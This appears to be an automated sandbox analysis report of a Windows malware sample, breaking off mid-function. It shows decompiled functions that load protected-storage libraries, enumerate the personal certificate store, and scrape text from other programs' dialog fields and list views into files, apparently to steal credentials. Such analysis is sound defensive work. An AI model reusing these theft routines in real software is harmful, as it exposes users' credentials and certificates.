        • Opcode Fuzzy Hash: 4c27b2217d11043de3481ba3151263d24bd1767be6b9fe08a2f398d3a517715e
        • Instruction Fuzzy Hash: DEF01C72A04129EBCB10DF68CC04A9F77A8FB00780F014166B914E3281D374FE50D7A9
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E0040F272() {
        				long _t7;
        				signed int _t8;
        				intOrPtr _t9;
        				void* _t12;
        				void* _t14;
        
        				_t12 = _t14 - 0x78;
        				_t7 = GetTimeZoneInformation(_t12 - 0x34);
        				if(_t7 != 1) {
        					if(_t7 != 2) {
        						_t8 = 0;
        					} else {
        						_t9 =  *((intOrPtr*)(_t12 + 0x74));
        						goto L4;
        					}
        				} else {
        					_t9 =  *((intOrPtr*)(_t12 + 0x20));
        					L4:
        					_t8 = (_t9 +  *(_t12 - 0x34)) * 0xffffffc4;
        				}
        				return _t8;
        			}

        APIs
        • GetTimeZoneInformation.KERNEL32(?), ref: 0040F281
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: InformationTimeZone
        • String ID:
        • API String ID: 565725191-0
        • Opcode ID: 39a509d7ec5f0773fff989cfa16d5616b8cb6f3bbb15af31aea5748086680c85
        • Instruction ID: c11e6b97314f4233d0158c1f4906bae7ba20c7f19be4bdcddf27278268f52110
        • Opcode Fuzzy Hash: 39a509d7ec5f0773fff989cfa16d5616b8cb6f3bbb15af31aea5748086680c85
        • Instruction Fuzzy Hash: B1E08635A48109CBDB34DBE4FD4199E77E9A745314F20097EE402F3AC0D23DDD498A06
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 98%
        			E004103AE(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
        				signed int _v8;
        				signed int _v12;
        				intOrPtr* _v16;
        				signed int _v20;
        				unsigned int _t67;
        				signed int _t68;
        				intOrPtr _t71;
        				void* _t79;
        				signed int _t81;
        				intOrPtr _t87;
        				intOrPtr _t88;
        				signed int _t98;
        				signed int _t99;
        				signed int _t100;
        				signed int _t101;
        				signed int _t102;
        				unsigned int _t103;
        				signed int _t104;
        				signed int _t106;
        				signed int _t108;
        				signed int _t111;
        				signed int _t115;
        				signed int _t116;
        				intOrPtr* _t119;
        				unsigned int _t125;
        				signed int _t126;
        				signed int _t128;
        
        				_t71 = _a4;
        				_t98 = 0;
        				_t99 = 0;
        				_v16 = 0;
        				_v20 = 1;
        				L1:
        				while(1) {
        					if(_t99 <= 0) {
        						_t103 =  *(_t98 + _t71);
        						_t98 = _t98 + 4;
        						_t99 = 0x1f;
        						_t104 = _t103 >> 0x1f;
        					} else {
        						_t99 = _t99 - 1;
        						_t104 = _t67 >> _t99 & 0x00000001;
        					}
        					if(_t104 != 0) {
        						_v16 = _v16 + 1;
        						 *((char*)(_v16 + _a12)) =  *(_t98 + _t71);
        						_t98 = _t98 + 1;
        						L6:
        						_t71 = _a4;
        						continue;
        					}
        					_v12 = 1;
        					do {
        						if(_t99 <= 0) {
        							_t67 =  *(_t98 + _t71);
        							_t98 = _t98 + 4;
        							_t100 = 0x1f;
        							_t106 = _t67 >> 0x1f;
        						} else {
        							_t100 = _t99 - 1;
        							_t106 = _t67 >> _t100 & 0x00000001;
        						}
        						_v12 = _t106 + _v12 * 2;
        						if(_t100 <= 0) {
        							_t67 =  *(_t98 + _t71);
        							_t98 = _t98 + 4;
        							_t99 = 0x1f;
        							_t108 = _t67 >> 0x1f;
        						} else {
        							_t99 = _t100 - 1;
        							_t108 = _t67 >> _t99 & 0x00000001;
        						}
        					} while (_t108 == 0);
        					_t111 = _v12;
        					if(_t111 == 2) {
        						_t81 = _v20;
        						L19:
        						_v12 = _t81;
        						if(_t99 <= 0) {
        							_t67 =  *(_t98 + _t71);
        							_t98 = _t98 + 4;
        							_t101 = 0x1f;
        							_v8 = _t67 >> 0x1f;
        						} else {
        							_t101 = _t99 - 1;
        							_v8 = _t67 >> _t101 & 0x00000001;
        						}
        						if(_t101 <= 0) {
        							_t67 =  *(_t98 + _t71);
        							_t98 = _t98 + 4;
        							_t99 = 0x1f;
        							_t115 = _t67 >> 0x1f;
        						} else {
        							_t99 = _t101 - 1;
        							_t115 = _t67 >> _t99 & 0x00000001;
        						}
        						_t116 = _t115 + _v8 * 2;
        						_v8 = _t116;
        						if(_t116 == 0) {
        							_v8 = 1;
        							do {
        								if(_t99 <= 0) {
        									_t125 =  *(_t98 + _t71);
        									_t98 = _t98 + 4;
        									_t102 = 0x1f;
        									_t126 = _t125 >> 0x1f;
        								} else {
        									_t102 = _t99 - 1;
        									_t126 = _t67 >> _t102 & 0x00000001;
        								}
        								_v8 = _t126 + _v8 * 2;
        								if(_t102 <= 0) {
        									_t67 =  *(_t98 + _t71);
        									_t98 = _t98 + 4;
        									_t99 = 0x1f;
        									_t128 = _t67 >> 0x1f;
        								} else {
        									_t99 = _t102 - 1;
        									_t128 = _t67 >> _t99 & 0x00000001;
        								}
        							} while (_t128 == 0);
        							_v8 = _v8 + 2;
        						}
        						asm("sbb ecx, ecx");
        						_v8 = _v8 +  ~0xd00;
        						_t87 = _v16;
        						_t119 = _t87 - _v12 + _a12;
        						_v16 = _t119;
        						 *((char*)(_t87 + _a12)) =  *_t119;
        						_t88 = _t87 + 1;
        						_v16 = _v16 + 1;
        						do {
        							 *((char*)(_t88 + _a12)) =  *_v16;
        							_t88 = _t88 + 1;
        							_v16 = _v16 + 1;
        							_t57 =  &_v8;
        							 *_t57 = _v8 - 1;
        						} while ( *_t57 != 0);
        						_v16 = _t88;
        						goto L6;
        					}
        					_t79 = ( *(_t98 + _t71) & 0x000000ff) + (_t111 + 0xfffffffd << 8);
        					_t98 = _t98 + 1;
        					if(_t79 != 0xffffffff) {
        						_t81 = _t79 + 1;
        						_v20 = _t81;
        						goto L19;
        					}
        					_t68 = _a16;
        					 *_t68 = _v16;
        					return _t68 & 0xffffff00 | _t98 == _a8;
        				}
        			}

        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 3e65220d72b0552e9fc1fb6bbe11ff6f12cdf0da83dde93640108036a636b790
        • Instruction ID: 8b3ed8ea53b6ed028aa8ddf7134e7d0d6a82fb9283c54b5096e5c9e2e926022a
        • Opcode Fuzzy Hash: 3e65220d72b0552e9fc1fb6bbe11ff6f12cdf0da83dde93640108036a636b790
        • Instruction Fuzzy Hash: 6B51D832E00A299BDB14CE58C4502EDF7B1EF85324F1A41AACD56BF381D6B4ADC1DB84
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 100%
        			E004100D7() {
        				signed int _t18;
        				signed int _t38;
        				signed int _t55;
        				signed int _t56;
        				signed int* _t59;
        				signed int _t60;
        				signed int* _t61;
        
        				_t18 =  *0x415fa4; // 0x191
        				if(_t18 >= 0x270) {
        					_t60 = 0;
        					do {
        						_t55 = _t60 << 2;
        						_t1 = _t55 + 0x4155dc; // 0xa15c94c5
        						_t2 = 0x4155d8 + _t55; // 0xea900f15
        						_t3 = 0x4155d8 + _t55; // 0xea900f15
        						_t6 = _t55 + 0x415c0c; // 0xcc52a6db
        						_t60 = _t60 + 1;
        						 *(0x4155d8 + _t55) = (( *_t1 ^  *_t2) & 0x7fffffff ^  *_t3) >> 0x00000001 ^  *(0x414534 + ((( *_t1 ^  *_t2) & 0x7fffffff ^  *_t3) & 0x00000001) * 4) ^  *_t6;
        					} while (_t60 < 0xe3);
        					if(_t60 < 0x26f) {
        						_t59 =  &(0x4155d8[_t60]);
        						do {
        							_t10 =  &(_t59[1]); // 0x4
        							_t61 = _t10;
        							 *_t59 =  *(0x414534 + ((( *_t59 ^  *_t61) & 0x7fffffff ^  *_t59) & 0x00000001) * 4) ^  *(_t61 - 0x390) ^ (( *_t59 ^  *_t61) & 0x7fffffff ^  *_t59) >> 0x00000001;
        							_t59 = _t61;
        						} while (_t59 < 0x415f94);
        					}
        					_t56 =  *0x415f94; // 0x787f3bca
        					_t38 =  *0x4155d8; // 0xea900f15
        					 *0x415f94 = ((_t38 ^ _t56) & 0x7fffffff ^ _t56) >> 0x00000001 ^  *(0x414534 + (((_t38 ^ _t56) & 0x7fffffff ^ _t56) & 0x00000001) * 4) ^  *0x415c08;
        					_t18 = 0;
        				}
        				 *0x415fa4 = _t18 + 1;
        				return (0x4155d8[_t18] ^ 0x4155d8[_t18] >> 0x0000000b ^ ((0x4155d8[_t18] ^ 0x4155d8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x4155d8[_t18] ^ 0x4155d8[_t18] >> 0x0000000b ^ ((0x4155d8[_t18] ^ 0x4155d8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f) >> 0x00000012 ^ 0x4155d8[_t18] ^ 0x4155d8[_t18] >> 0x0000000b ^ ((0x4155d8[_t18] ^ 0x4155d8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007 ^ ((0x4155d8[_t18] ^ 0x4155d8[_t18] >> 0x0000000b ^ ((0x4155d8[_t18] ^ 0x4155d8[_t18] >> 0x0000000b) & 0xff3a58ad) << 0x00000007) & 0xffffdf8c) << 0x0000000f;
        			}

        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID:
        • String ID:
        • API String ID:
        • Opcode ID: 70b894a97b3990c829c72de1d08ce55cf70c0e5e058ff0cc01cfce1a1c5a6acb
        • Instruction ID: 52c786fe84f74037f7caae4f787f933e7ce83a8d22a1e5ce0a6b82dd9a185fe3
        • Opcode Fuzzy Hash: 70b894a97b3990c829c72de1d08ce55cf70c0e5e058ff0cc01cfce1a1c5a6acb
        • Instruction Fuzzy Hash: E6213C36221801DFD748CF38DC996D633E3E7C93187298579D119CB294DA3AE453CB48
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 66%
        			E0040586C(void* __ecx) {
        				intOrPtr _v1064;
        				intOrPtr _v1084;
        				void* _v1088;
        				void* _v1096;
        				short _v1588;
        				void* _v1592;
        				struct HINSTANCE__* _v1596;
        				char _v1600;
        				signed int _v1604;
        				short _v1608;
        				intOrPtr _v1612;
        				WCHAR* _t59;
        				int _t62;
        				void* _t67;
        				intOrPtr _t70;
        				void* _t75;
        				void* _t86;
        				void* _t90;
        				void* _t96;
        				void* _t101;
        				WCHAR* _t104;
        				WCHAR* _t106;
        				WCHAR* _t107;
        				void* _t114;
        
        				_t101 = __ecx;
        				 *0x414780 = 0;
        				 *0x41479c = 0;
        				 *0x41479f = 0;
        				 *0x41479e = GetModuleHandleA("rndhook.dll") & 0xffffff00 | _t36 != 0x00000000;
        				 *0x41479d = 1;
        				E0040AEF2(0);
        				E00412C8D();
        				L00404155();
        				E0040882D();
        				 *0x415fb0 = 0;
        				_v1600 = 1;
        				lstrcpyW( &_v1588,  *0x414a3c);
        				_t104 = L"rsldps";
        				lstrcatW( &_v1588, _t104);
        				_v1592 = CreateMutexW(0x4155b4, 1, _t104);
        				if(GetLastError() == 0) {
        					_t106 = "09ck_=ldfuihpfre";
        					_t67 = E004089BF(_t47, _t101, 1, _t106);
        					_t121 = _t67 - 4;
        					if(_t67 != 4) {
        						E00404FFB();
        						_push( &_v1600);
        						_push(_t106);
        						_push(1);
        						_t96 = 4;
        						E00408A2F(_t96, _t121);
        					}
        					_t107 = "3709128dk0023444";
        					_v1604 = 0;
        					if(E004089BF( &_v1604, _t101, 1, _t107) != 4) {
        						_v1596 = 0;
        					} else {
        						_v1596 =  *_v1604;
        					}
        					_t70 = E004045A1(_t101, 0, L"MY", 0, _v1596);
        					_v1612 = _t70;
        					_t123 = _t70 - _v1608;
        					if(_t70 != _v1608) {
        						_push( &_v1600);
        						_push(_t107);
        						_push(1);
        						_t90 = 4;
        						E00408A2F(_t90, _t123);
        					}
        					E0040F15E(_v1604);
        					_v1608 = 0;
        					if(E004089BF( &_v1608, _t101, 1, "!!!0-0=9-0=23434") != 0) {
        						_t86 = E00408668(_t101, _v1604, _t73);
        						_t125 = _t86;
        						if(_t86 != 0) {
        							E00408AA6(_t125, 1, "!!!0-0=9-0=23434");
        						}
        						E0040F15E(_v1604);
        					}
        					_t75 = E004089BF(0, _t101, 1, "~23324m\'m434dKkl");
        					_t126 = _t75 - 4;
        					if(_t75 == 4) {
        						 *0x414c24(0x10000, 0, 0, E004046EE);
        						E00408AA6(_t126, 1, "~23324m\'m434dKkl");
        					}
        					_v1604 = 0;
        					if(E004089BF( &_v1604, _t101, 1, "3208()_*09303333") == 4) {
        						E004053C0((_v1604 & 0xffffff00 |  *_v1604 == 0x00000000) & 0x000000ff);
        						E00408AA6( *_v1604 == 0, 1, "3208()_*09303333");
        					}
        					E0040F15E(_v1604);
        				}
        				if(_v1592 != 0) {
        					CloseHandle(_v1592);
        				}
        				 *0x414f9c = 0;
        				 *0x414f98 = 0;
        				 *0x414ed4("urityDescriptorToAccessNamedA");
        				 *0x414f5c = 0;
        				 *0x414f58 = 0;
        				 *0x414f60 = 0;
        				 *0x414f64 = 0;
        				 *0x414ed4("essAsUserA");
        				 *0x414ed4(0x4147a4);
        				 *0x4147c4 = 0;
        				E004063F9();
        				 *0x4147c8 = 0;
        				 *0x4147c0 = 0;
        				 *0x414d14 = 0;
        				 *0x414f24 = 0x2d;
        				 *0x414f14 = 0x2d;
        				 *0x414f25 = 0;
        				 *0x414f15 = 0;
        				 *0x414ed4("FrameRect");
        				_v1084 = 0x428;
        				_t114 = CreateToolhelp32Snapshot(8,  *0x414c94);
        				if(_t114 == 0xffffffff) {
        					L23:
        					if(GetModuleFileNameW(0,  &_v1608, 0x103) > 0xa) {
        						_t59 = PathFindFileNameW( &_v1608);
        						if(_t59 != 0 && lstrcmpiW(_t59, L"osl2sks.exe") == 0) {
        							 *0x41479f = 1;
        						}
        					}
        					return 1;
        				} else {
        					_t62 = Module32FirstW(_t114,  &_v1088);
        					while(_t62 != 0) {
        						E00407A50(0x4144e0, _t101, 0, _v1064);
        						_t62 = Module32NextW(_t114,  &_v1096);
        					}
        					goto L23;
        				}
        			}

        APIs
        • GetModuleHandleA.KERNEL32(rndhook.dll), ref: 00405894
          • Part of subcall function 0040AEF2: CharLowerBuffA.USER32(00000000,00000031,?,?,?,?,00000001,?,00000002), ref: 0040B025
          • Part of subcall function 00412C8D: PathCombineW.SHLWAPI(?,0241F5A8,?), ref: 00412CB4
          • Part of subcall function 00412C8D: PathCombineW.SHLWAPI(yNameW,yNameW,?), ref: 00412CC3
        • lstrcpyW.KERNEL32(?), ref: 004058D9
        • lstrcatW.KERNEL32(?,rsldps), ref: 004058EA
        • CreateMutexW.KERNEL32(004155B4,00000001,rsldps), ref: 004058F7
        • GetLastError.KERNEL32 ref: 00405901
        • CertEnumSystemStore.CRYPT32(00010000,00000000,00000000,004046EE), ref: 004059E3
        • CloseHandle.KERNEL32(?), ref: 00405A35
        • RtlInitializeCriticalSection.NTDLL(urityDescriptorToAccessNamedA), ref: 00405A4C
        • RtlInitializeCriticalSection.NTDLL(essAsUserA), ref: 00405A6F
        • RtlInitializeCriticalSection.NTDLL(004147A4), ref: 00405A7A
        • RtlInitializeCriticalSection.NTDLL(FrameRect), ref: 00405ABE
        • CreateToolhelp32Snapshot.KERNEL32(00000008), ref: 00405AD7
        • Module32FirstW.KERNEL32(00000000,?), ref: 00405AED
        • Module32NextW.KERNEL32(00000000,?), ref: 00405B0F
          • Part of subcall function 00404FFB: LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00405011
          • Part of subcall function 00404FFB: GetProcAddress.KERNELBASE(00000000), ref: 00405018
        • GetModuleFileNameW.KERNEL32(00000000,?,00000103), ref: 00405B24
        • PathFindFileNameW.SHLWAPI(?), ref: 00405B34
        • lstrcmpiW.KERNEL32(00000000,osl2sks.exe), ref: 00405B44
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: CriticalInitializeSection$Path$CombineCreateFileHandleModuleModule32Name$AddressBuffCertCharCloseEnumErrorFindFirstLastLibraryLoadLowerMutexNextProcSnapshotStoreSystemToolhelp32lstrcatlstrcmpilstrcpy
        • String ID: !!!0-0=9-0=23434$09ck_=ldfuihpfre$3208()_*09303333$3709128dk0023444$FrameRect$ageW$eateProcessAsUserA$esA$osl2sks.exe$rndhook.dll$rsldps$urityDescriptorToAccessNamedA$~23324m'm434dKkl
        • API String ID: 807594470-2706104865
        • Opcode ID: 43b79262da27aa19cbcf072ac9da5f090808976af4895ba3a418bd811c1c7f2a
        • Instruction ID: ab620f3749bfd49a8e89e1d76c1992060f070b704acf4078ca298003f8e660e3
        • Opcode Fuzzy Hash: 43b79262da27aa19cbcf072ac9da5f090808976af4895ba3a418bd811c1c7f2a
        • Instruction Fuzzy Hash: 0571B2B1504341AFC720AF62ED49A9B7BA8EBD5714F00843FF455A22E1CB389944CB6E
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 60%
        			E0040C34D(struct HWND__* __eax, void* __edx) {
        				int _t24;
        				intOrPtr _t27;
        				signed int _t30;
        				struct HWND__* _t37;
        				int _t58;
        				void* _t59;
        				void* _t60;
        				struct HWND__* _t62;
        				int _t68;
        				WCHAR* _t69;
        				void* _t70;
        				void* _t72;
        				intOrPtr _t78;
        
        				_t60 = __edx;
        				_t24 = __eax;
        				_t70 = _t72 - 0x74;
        				_t62 = __eax;
        				_t78 =  *0x414d14; // 0x1d50065
        				if(_t78 == 0 ||  *((intOrPtr*)(_t70 + 0x7c)) != 1) {
        					L22:
        					return _t24;
        				} else {
        					GetWindowTextW(__eax, _t70 - 0x64, 0x64);
        					_t27 =  *0x414ad4; // 0x241f5a8
        					_t24 = StrStrW(_t70 - 0x64,  *(_t27 + 0x190));
        					if(_t24 == 0) {
        						goto L22;
        					}
        					_t24 = GetDlgItem(_t62, 1);
        					if(_t24 == 0) {
        						goto L22;
        					}
        					_t24 = GetDlgItem(_t62, 2);
        					if(_t24 == 0) {
        						goto L22;
        					}
        					if(GetDlgItem(_t62, 0x142) == 0 || GetDlgItem(_t62, 0x396) == 0) {
        						_t30 = GetDlgItem(_t62, 0xe2);
        						__eflags = _t30;
        						if(_t30 == 0) {
        							L16:
        							_t24 = GetDlgItem(_t62, 0x203);
        							__eflags = _t24;
        							if(_t24 == 0) {
        								L21:
        								goto L22;
        							}
        							_t24 =  *0x414ab8(GetDlgItem(_t62, 0x115), 0xfffffff0);
        							__eflags = _t24 & 0x00000020;
        							if((_t24 & 0x00000020) == 0) {
        								goto L21;
        							}
        							_t24 = GetDlgItemTextA(_t62, 0x115, _t70 - 0x198, 0x100);
        							_t68 = _t24;
        							__eflags = _t68 - 2;
        							if(_t68 <= 2) {
        								goto L21;
        							}
        							wnsprintfW(_t70 - 0x64, 0x63, L"kwm\\%S.%s", "rlappedAccessResults", L"txt");
        							_push(_t68);
        							_push(_t70 - 0x198);
        							_push(_t70 - 0x64);
        							_push(0);
        							L20:
        							_push(3);
        							_t24 = E0041341D(_t59, _t60);
        							goto L21;
        						}
        						_t37 = GetDlgItem(_t62, 0xe1);
        						__eflags = _t37;
        						if(_t37 == 0) {
        							goto L16;
        						}
        						_t24 = GetDlgItemTextW(_t62, 0xd2, _t70 - 0x3a0, 0x104);
        						__eflags = _t24 - 5;
        						if(_t24 <= 5) {
        							goto L21;
        						}
        						_t24 = GetDlgItemTextA(_t62, 0xd8, _t70 - 0x198, 0x100);
        						_t58 = _t24;
        						__eflags = _t58 - 2;
        						if(__eflags <= 0) {
        							goto L21;
        						}
        						_t69 = L"kwm\\%S.%s";
        						wnsprintfW(_t70 - 0x64, 0x63, _t69, 0x414f14, L"kwm");
        						_t24 = E00413599(_t59, _t60, __eflags, _t70 - 0x3a0, 0, _t70 - 0x64);
        						__eflags = _t24;
        						if(_t24 == 0) {
        							goto L21;
        						}
        						wnsprintfW(_t70 - 0x64, 0x63, _t69, 0x414f14, L"txt");
        						_push(_t58);
        						_push(_t70 - 0x198);
        						_push(_t70 - 0x64);
        						_push(0);
        						goto L20;
        					} else {
        						_t24 = GetDlgItemTextA(_t62, 0x124, _t70 + 0x64, 0xd);
        						if(_t24 == 0xc) {
        							_t24 = GetDlgItemTextA(_t62, 0x125, _t70 - 0x98, 0x32);
        							if(_t24 > 2) {
        								 *0x414dd8("rlappedAccessResults", _t70 + 0x64);
        								 *0x414dd8("ults", _t70 - 0x98);
        								_t24 = E0040B81A(_t59, E0040BFC9, 0);
        							}
        						}
        						goto L22;
        					}
        				}
        			}

        APIs
        • GetWindowTextW.USER32(?,?,00000064), ref: 0040C37B
        • StrStrW.SHLWAPI(?,?,?,00000000), ref: 0040C390
        • GetDlgItem.USER32(?,00000001), ref: 0040C3A1
        • GetDlgItem.USER32(?,00000002), ref: 0040C3B2
        • GetDlgItem.USER32(?,00000142), ref: 0040C3C6
        • GetDlgItem.USER32(?,00000396), ref: 0040C3D6
        • GetDlgItemTextA.USER32(?,00000124,?,0000000D), ref: 0040C3EC
        • GetDlgItemTextA.USER32(?,00000125,?,00000032), ref: 0040C40A
        • lstrcpy.KERNEL32(rlappedAccessResults,?), ref: 0040C422
        • lstrcpy.KERNEL32(ults,?), ref: 0040C434
          • Part of subcall function 0040B81A: CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 0040B830
          • Part of subcall function 0040B81A: CloseHandle.KERNEL32(00000000,?,?,0040C445,0040BFC9,00000000,?,00000000), ref: 0040B837
        • GetDlgItem.USER32(?,000000E2), ref: 0040C451
        • GetDlgItem.USER32(?,000000E1), ref: 0040C465
        • GetDlgItemTextW.USER32(?,000000D2,?,00000104), ref: 0040C485
        • GetDlgItemTextA.USER32(?,000000D8,?,00000100), ref: 0040C4A6
        • wnsprintfW.SHLWAPI ref: 0040C4CE
        • wnsprintfW.SHLWAPI ref: 0040C4FE
        • GetDlgItem.USER32(?,00000203), ref: 0040C51D
        • GetDlgItem.USER32(?,00000115), ref: 0040C530
        • GetDlgItemTextA.USER32(?,00000115,?,00000100), ref: 0040C54F
        • wnsprintfW.SHLWAPI ref: 0040C571
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.458525840.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
        Similarity
        • API ID: Item$Text$wnsprintf$lstrcpy$CloseCreateHandleThreadWindow
        • String ID: kwm$kwm\%S.%s$rlappedAccessResults$txt
        • API String ID: 3236458500-3919458511
        • Opcode ID: d9c6686378021a613eeac201a07cf7d3d07698e70632bfdae35dbf3121379460
        • Instruction ID: 5d2fe1c06c2eb22c66538d8d224e61cf568f620e902f0f0f3d4b9037554a9eb0
        • Opcode Fuzzy Hash: d9c6686378021a613eeac201a07cf7d3d07698e70632bfdae35dbf3121379460
        • Instruction Fuzzy Hash: 3F518E71680218BFD7209BA09D89FFB367CAF85B41F114536FA09F61C0D7789A448B6D
        Uniqueness

        Uniqueness Score: -1.00%

        C-Code - Quality: 77%
        			E0040BFC9() {
        				int _v8;
        				struct HWND__* _v12;
        				short _v16;
        				signed int _v20;
        				long _v24;
        				char _v28;
        				int _v32;
        				long _v36;
        				struct HWND__* _v40;
        				short _v42;
        				short _v44;
        				signed int _v48;
        				signed int _v52;
        				intOrPtr _v88;
        				CHAR* _v92;
        				int _v104;
        				int _v108;
        				void* _v112;
        				short _v130;
        				char _v132;
        				short _v330;
        				char _v332;
        				intOrPtr _t88;
        				struct HWND__* _t89;
        				intOrPtr _t93;
        				int _t96;
        				int _t99;
        				long _t107;
        				CHAR* _t108;
        				char* _t112;
        				int _t116;
        				long _t117;
        				int _t119;
        				int _t123;
        				short _t124;
        				char _t132;
        				int _t135;
        				signed int _t136;
        				signed char _t142;
        				signed char _t145;
        				intOrPtr _t152;
        				signed char _t153;
        				signed int _t154;
        				int _t155;
        				struct HWND__* _t157;
        				signed int _t158;
        				void* _t162;
        				void* _t163;
        
        				SetThreadPriority(GetCurrentThread(), 0xfffffffe);
        				_t155 = 0;
        				_v16 = 0;
        				while(1) {
        					L1:
        					Sleep(0x2710);
        					_t88 =  *0x414ad4; // 0x241f5a8
        					_push( *((intOrPtr*)(_t88 + 0x194)));
        					_push(0x8002);
        					_push(_t155);
        					while(1) {
        						L8:
        						_t89 = FindWindowExW(_t155, ??, ??, ??);
        						_v12 = _t89;
        						if(_t89 == _t155) {
        							goto L1;
        						}
        						_v24 = _t155;
        						GetWindowThreadProcessId(_v12,  &_v24);
        						__eflags = _v24 -  *0x414c94; // 0x1030
        						if(__eflags != 0) {
        							L7:
        							_t93 =  *0x414ad4; // 0x241f5a8
        							_push( *((intOrPtr*)(_t93 + 0x194)));
        							_push(0x8002);
        							_push(_v12);
        							continue;
        						}
        						_t157 = GetDlgItem(_v12, 0x1a3);
        						_v40 = _t157;
        						__eflags = _t157 - _t155;
        						if(_t157 == _t155) {
        							goto L7;
        						}
        						_t96 = GetClassNameW(_t157,  &_v332, 0x63);
        						_t145 = 3;
        						__eflags = _t96 - _t145;
        						if(_t96 <= _t145) {
        							goto L7;
        						}
        						_t154 = _t154 | 0xffffffff;
        						_t99 = E0040F6F6(_t154, L"SysListView32", _t154,  &_v332);
        						__eflags = _t99;
        						if(_t99 != 0) {
        							goto L7;
        						}
        						_v36 = SendMessageW(_t157, 0x1004, _t155, _t155);
        						_t158 = SendMessageW(SendMessageW(_t157, 0x101f, _t155, _t155), 0x1200, _t155, _t155);
        						__eflags = _t158 - _t155;
        						if(_t158 > _t155) {
        							__eflags = _v36 - _t155;
        							_v8 = _t155;
        							_v112 = _t145;
        							_v108 = _t155;
        							if(_v36 <= _t155) {
        								L53:
        								E0040F15E(_v8);
        								while(1) {
        									L1:
        									Sleep(0x2710);
        									_t88 =  *0x414ad4; // 0x241f5a8
        									_push( *((intOrPtr*)(_t88 + 0x194)));
        									_push(0x8002);
        									_push(_t155);
        									goto L8;
        								}
        							} else {
        								goto L11;
        							}
        							do {
        								L11:
        								_v20 = _v20 | 0xffffffff;
        								_t145 = _t145 | 0x000000ff;
        								__eflags = _t158 - _t155;
        								_v104 = _t155;
        								if(_t158 > _t155) {
        									while(1) {
        										_v332 = 0;
        										_v92 =  &_v332;
        										_v88 = 0xbe;
        										_t107 = SendMessageW(_v40, 0x1005, _t155,  &_v112);
        										__eflags = _t107;
        										if(_t107 == 0) {
        											goto L53;
        										}
        										_t108 =  &_v332;
        										__eflags = _v92 - _t108;
        										if(_v92 != _t108) {
        											__eflags = _v92 - _t155;
        											if(_v92 != _t155) {
        												 *0x414dd8(_t108, _v92);
        											}
        										}
        										_t154 = E0040F637( &_v332);
        										__eflags = _t145 - 0xff;
        										if(_t145 != 0xff) {
        											L28:
        											__eflags = _v20 - 0xffffffff;
        											if(_v20 == 0xffffffff) {
        												_v20 = E0040BF42(_t154,  &_v332);
        											}
        											__eflags = _v104 + 1 - _t158;
        											_t112 = "\r\n";
        											if(_v104 + 1 != _t158) {
        												_t112 = " | ";
        											}
        											 *0x414de0( &_v332, _t112);
        											_t116 = E0040A673( &_v8,  &_v332, _t155);
        											__eflags = _t116;
        											if(_t116 == 0) {
        												_t155 = 0;
        												__eflags = 0;
        												goto L53;
        											} else {
        												_v104 = _v104 + 1;
        												__eflags = _v104 - _t158;
        												if(_v104 < _t158) {
        													_t155 = 0;
        													__eflags = 0;
        													continue;
        												}
        												__eflags = _t145 - 0xff;
        												if(_t145 != 0xff) {
        													_t136 = _v20;
        													__eflags = _t136 - 0xffffffff;
        													if(_t136 != 0xffffffff) {
        														__eflags =  *((intOrPtr*)(0x401190 + (_t145 & 0x000000ff) * 4)) - _t136;
        														if(__eflags <= 0) {
        															_v52 = _v52 & 0x00000000;
        															_v48 = _v48 | 0xffffffff;
        															_v42 = 0xaf2;
        															_v44 = 0xaf2;
        															E0040B960(0xaf2, __eflags,  &_v52);
        															 *0x414be8 =  *0x414be8 | 0x00000002;
        															__eflags =  *0x414be8;
        														}
        													}
        												}
        												_t155 = 0;
        												__eflags = 0;
        												goto L39;
        											}
        										} else {
        											__eflags = _t154 - 0xd;
        											if(_t154 != 0xd) {
        												L27:
        												_t145 = _t145 | 0x000000ff;
        												__eflags = _t145;
        												goto L28;
        											}
        											_t142 = 1;
        											while(1) {
        												_t152 =  *((intOrPtr*)(_t162 + (_t142 & 0x000000ff) - 0x148));
        												__eflags = _t152 - 0x39;
        												if(_t152 > 0x39) {
        													goto L27;
        												}
        												__eflags = _t152 - 0x30;
        												if(_t152 < 0x30) {
        													goto L27;
        												}
        												_t142 = _t142 + 1;
        												__eflags = _t142 - 0xd;
        												if(_t142 < 0xd) {
        													continue;
        												}
        												_t153 = 0;
        												__eflags = 0;
        												while(1) {
        													_t145 = _v332;
        													_t36 = (_t153 & 0x000000ff) + "ZREGUYB"; // 0x59554745
        													__eflags = _t145 -  *_t36;
        													if(_t145 ==  *_t36) {
        														break;
        													}
        													_t153 = _t153 + 1;
        													__eflags = _t153 - 7;
        													if(_t153 < 7) {
        														continue;
        													}
        													goto L27;
        												}
        												_t145 = _t153;
        												goto L28;
        											}
        											goto L27;
        										}
        									}
        									goto L53;
        								}
        								L39:
        								_t154 = _v36;
        								_v108 = _v108 + 1;
        								__eflags = _v108 - _t154;
        							} while (_v108 < _t154);
        							__eflags = _v8 - _t155;
        							if(_v8 == _t155) {
        								goto L53;
        							}
        							_t148 = _v8;
        							_t117 = E0040F637(_v8);
        							__eflags = _t117 - (_t158 * 3 - 1) * _t154;
        							_v24 = _t117;
        							if(_t117 <= (_t158 * 3 - 1) * _t154) {
